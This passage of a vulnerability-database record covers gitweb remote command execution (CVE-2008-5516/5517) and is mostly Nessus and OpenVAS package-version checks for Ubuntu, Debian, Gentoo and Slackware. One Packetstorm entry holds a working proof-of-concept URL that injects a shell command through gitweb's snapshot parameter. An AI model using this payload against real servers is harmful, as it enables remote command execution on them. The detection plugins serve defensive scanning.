audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"git-arch\", pkgver:\"1.1.3-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"git-core\", pkgver:\"1.1.3-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"git-cvs\", pkgver:\"1.1.3-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"git-doc\", pkgver:\"1.1.3-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"git-email\", pkgver:\"1.1.3-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"git-svn\", pkgver:\"1.1.3-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"gitk\", pkgver:\"1.1.3-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"git-arch\", pkgver:\"1.5.2.5-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"git-core\", pkgver:\"1:1.5.2.5-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"git-cvs\", pkgver:\"1.5.2.5-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"git-daemon-run\", pkgver:\"1.5.2.5-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"git-doc\", pkgver:\"1.5.2.5-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"git-email\", pkgver:\"1.5.2.5-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"git-gui\", pkgver:\"1.5.2.5-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"git-p4\", pkgver:\"1.5.2.5-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"git-svn\", pkgver:\"1.5.2.5-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"gitk\", pkgver:\"1.5.2.5-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"gitweb\", pkgver:\"1:1.5.2.5-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"git-arch\", pkgver:\"1.5.4.3-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"git-core\", pkgver:\"1:1.5.4.3-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"git-cvs\", pkgver:\"1.5.4.3-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"git-daemon-run\", pkgver:\"1.5.4.3-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"git-doc\", pkgver:\"1.5.4.3-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"git-email\", pkgver:\"1.5.4.3-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"git-gui\", pkgver:\"1.5.4.3-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"git-svn\", pkgver:\"1.5.4.3-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"gitk\", pkgver:\"1.5.4.3-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"gitweb\", pkgver:\"1:1.5.4.3-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"git-arch\", pkgver:\"1.5.6.3-1.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"git-core\", pkgver:\"1:1.5.6.3-1.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"git-cvs\", pkgver:\"1.5.6.3-1.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"git-daemon-run\", pkgver:\"1.5.6.3-1.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"git-doc\", pkgver:\"1.5.6.3-1.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"git-email\", pkgver:\"1.5.6.3-1.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"git-gui\", pkgver:\"1.5.6.3-1.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"git-svn\", pkgver:\"1.5.6.3-1.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"gitk\", pkgver:\"1.5.6.3-1.1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"gitweb\", pkgver:\"1:1.5.6.3-1.1ubuntu2.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git-arch / git-core / git-cvs / git-daemon-run / git-doc / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:07", "bulletinFamily": "exploit", "description": "", "modified": "2010-02-19T00:00:00", "published": "2010-02-19T00:00:00", "href": "https://packetstormsecurity.com/files/86450/gitWeb-1.x-Remote-Command-Execution.html", "id": "PACKETSTORM:86450", "type": "packetstorm", "title": "gitWeb 1.x Remote Command Execution", "sourceData": "` \n \n# Exploit Title: gitWeb remote command execution \n# Date: 2009.06.19 \n# Author: S2 Crew [Hungary] \n# Software Link: - \n# Version: GIT 1.X \n# Tested on: debian linux, GIT 1.5.2 \n# CVE: CVE-2008-5516 - CVE-2008-5517 \n \n# Code: \n \nhttp://target/cgi-bin/gitweb2.cgi?p=workspace/.git;a=snapshot;f=.svn/prop-base/CHANGELOG.svn-base;h=7b57b302a4f016c8afdce6dc2df9e831460ccd82|`touch$IFS/tmp/aap`|;hb=10b50960665569a2e8b9588d60a66303c8e359f2 \n \n \n \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/86450/gitweb-exec.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-24T12:56:31", "bulletinFamily": "scanner", "description": "The remote host is missing an update to git-core\nannounced via advisory DSA 1708-1.", "modified": "2017-07-07T00:00:00", "published": "2009-01-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=63222", "id": "OPENVAS:63222", "title": "Debian Security Advisory DSA 1708-1 (git-core)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1708_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1708-1 (git-core)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that gitweb, the web interface for the Git version\ncontrol system, contained several vulnerabilities:\n\nRemote attackers could use crafted requests to execute shell commands on\nthe web server, using the snapshot generation and pickaxe search\nfunctionality (CVE-2008-5516).\n\nLocal users with write access to the configuration of a Git repository\nserved by gitweb could cause gitweb to execute arbitrary shell commands\nwith the permission of the web server (CVE-2008-5517).\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.4.4.4-4+etch1.\n\nFor the unstable distribution (sid) and testing distribution (lenny),\nthe remote shell command injection issuei (CVE-2008-5516) has been fixed\nin version 1.5.6-1. The other issue will be fixed soon.\n\nWe recommend that you upgrade your Git packages.\";\ntag_summary = \"The remote host is missing an update to git-core\nannounced via advisory DSA 1708-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201708-1\";\n\n\nif(description)\n{\n script_id(63222);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-20 22:42:09 +0100 (Tue, 20 Jan 2009)\");\n script_cve_id(\"CVE-2008-5516\", \"CVE-2008-5517\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1708-1 (git-core)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"gitweb\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-daemon-run\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-svn\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gitk\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-doc\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-email\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-arch\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-cvs\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-core\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:38:33", "bulletinFamily": "scanner", "description": "The remote host is missing an update to git-core\nannounced via advisory DSA 1708-1.", "modified": "2018-04-06T00:00:00", "published": "2009-01-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063222", "id": "OPENVAS:136141256231063222", "title": "Debian Security Advisory DSA 1708-1 (git-core)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1708_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1708-1 (git-core)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that gitweb, the web interface for the Git version\ncontrol system, contained several vulnerabilities:\n\nRemote attackers could use crafted requests to execute shell commands on\nthe web server, using the snapshot generation and pickaxe search\nfunctionality (CVE-2008-5516).\n\nLocal users with write access to the configuration of a Git repository\nserved by gitweb could cause gitweb to execute arbitrary shell commands\nwith the permission of the web server (CVE-2008-5517).\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.4.4.4-4+etch1.\n\nFor the unstable distribution (sid) and testing distribution (lenny),\nthe remote shell command injection issuei (CVE-2008-5516) has been fixed\nin version 1.5.6-1. The other issue will be fixed soon.\n\nWe recommend that you upgrade your Git packages.\";\ntag_summary = \"The remote host is missing an update to git-core\nannounced via advisory DSA 1708-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201708-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63222\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-20 22:42:09 +0100 (Tue, 20 Jan 2009)\");\n script_cve_id(\"CVE-2008-5516\", \"CVE-2008-5517\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1708-1 (git-core)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"gitweb\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-daemon-run\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-svn\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gitk\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-doc\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-email\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-arch\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-cvs\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"git-core\", ver:\"1.4.4.4-4+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:38:22", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200903-15.", "modified": "2018-04-06T00:00:00", "published": "2009-03-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063546", "id": "OPENVAS:136141256231063546", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200903-15 (git)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in gitweb allow for remote execution of arbitrary\ncommands.\";\ntag_solution = \"All git users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-util/git-1.6.0.6'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200903-15\nhttp://bugs.gentoo.org/show_bug.cgi?id=251343\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200903-15.\";\n\n \n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63546\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-13 19:24:56 +0100 (Fri, 13 Mar 2009)\");\n script_cve_id(\"CVE-2008-5516\", \"CVE-2008-5517\", \"CVE-2008-5916\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200903-15 (git)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"dev-util/git\", unaffected: make_list(\"ge 1.6.0.6\"), vulnerable: make_list(\"lt 1.6.0.6\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:51:16", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2009-051-02.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=63428", "id": "OPENVAS:63428", "title": "Slackware Advisory SSA:2009-051-02 git", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2009_051_02.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New git packages are available for Slackware 12.0, 12.1, 12.2, and -current to\nfix security issues.\n\nThere are other security issues related to gitweb, which Slackware does not\nship, but could be added to a Slackware install. These problems are also\nfixed with this update.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2009-051-02.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2009-051-02\";\n \nif(description)\n{\n script_id(63428);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2008-3546\", \"CVE-2008-5516\", \"CVE-2008-5517\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2009-051-02 git \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"git\", ver:\"1.6.1.3-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"git\", ver:\"1.6.1.3-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"git\", ver:\"1.6.1.3-i486-1_slack12.2\", rls:\"SLK12.2\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:27", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200903-15.", "modified": "2017-07-07T00:00:00", "published": "2009-03-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=63546", "id": "OPENVAS:63546", "title": "Gentoo Security Advisory GLSA 200903-15 (git)", "type": "openvas", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in gitweb allow for remote execution of arbitrary\ncommands.\";\ntag_solution = \"All git users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-util/git-1.6.0.6'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200903-15\nhttp://bugs.gentoo.org/show_bug.cgi?id=251343\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200903-15.\";\n\n \n \n\nif(description)\n{\n script_id(63546);\n script_version(\"$Revision: 6595 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:19:55 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-13 19:24:56 +0100 (Fri, 13 Mar 2009)\");\n script_cve_id(\"CVE-2008-5516\", \"CVE-2008-5517\", \"CVE-2008-5916\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200903-15 (git)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"dev-util/git\", unaffected: make_list(\"ge 1.6.0.6\"), vulnerable: make_list(\"lt 1.6.0.6\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:21", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2009-051-02.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231063428", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063428", "title": "Slackware Advisory SSA:2009-051-02 git", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2009_051_02.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63428\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", 